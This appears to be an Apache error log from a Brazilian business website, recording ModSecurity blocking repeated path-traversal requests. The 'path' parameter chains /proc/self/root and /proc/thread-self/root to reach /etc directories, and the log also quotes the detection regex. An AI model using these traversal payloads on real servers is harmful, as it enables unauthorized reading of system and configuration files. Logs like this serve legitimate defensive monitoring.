[Wed Mar 18 17:13:57.762911 2026] [mime_magic:error] [pid 15051:tid 140411582465792] (70014)End of file found: [client 74.7.243.128:46570] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 17:13:58.256557 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:45208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHhgbLMZ6AikZjR9X_NAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:59.681369 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:45210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHhymAPhZkrhU8w4mohgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:03.854114 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:45214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHiwbLMZ6AikZjR9X_NwAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:05.890587 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:45224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHjSmAPhZkrhU8w4moiwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:06.146462 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:45224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHjimAPhZkrhU8w4mojQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:10.876956 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:55770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHkkzinOy1jxa1j4dcNQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:12.411440 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:55784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHlCmAPhZkrhU8w4mokgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:14.178562 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:55784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHlimAPhZkrhU8w4molAAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:15.228784 2026] [mime_magic:error] [pid 31803:tid 140411574073088] (70014)End of file found: [client 57.141.18.70:40454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:14:16.440276 2026] [mime_magic:error] [pid 11816:tid 140411691570944] (70014)End of file found: [client 57.141.18.1:40716] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:14:17.340471 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:55798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHmSmAPhZkrhU8w4momQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:18.137780 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39952] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:14:18.999424 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.241.31:41706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHmv-YZRR_7pZ7nDIvVwAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:28.038490 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:41720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHpAbLMZ6AikZjR9X_RwAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:32.843267 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.241.31:33286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHqP-YZRR_7pZ7nDIvZgAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:34.183917 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:33298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHqgSuyh5UNeevTVfi0gAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:36.687533 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.241.31:33312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHrBkFeYa1D6dYQnCLtgAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:37.986194 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:55278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHrQSuyh5UNeevTVfi1AAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:41.770126 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:55286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHsfu8EFLIOrSqIps99wAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:42.133893 2026] [proxy_fcgi:error] [pid 29882:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40388] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:14:44.680298 2026] [mime_magic:error] [pid 9530:tid 140411590858496] (70014)End of file found: [client 57.141.18.101:41412] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:14:50.469080 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:55300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHugbLMZ6AikZjR9X_TwAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:14:52.739482 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:48414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHvEzinOy1jxa1j4dcUwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:15:08.125841 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40892] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:15:25.972753 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:46584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absH3QkwaGbbGflqUZBRhgAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:15:32.259346 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:38776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absH5EzinOy1jxa1j4dcZwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 17:15:35.061896 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41368] AH01075: Error dispatching request to : (polling)
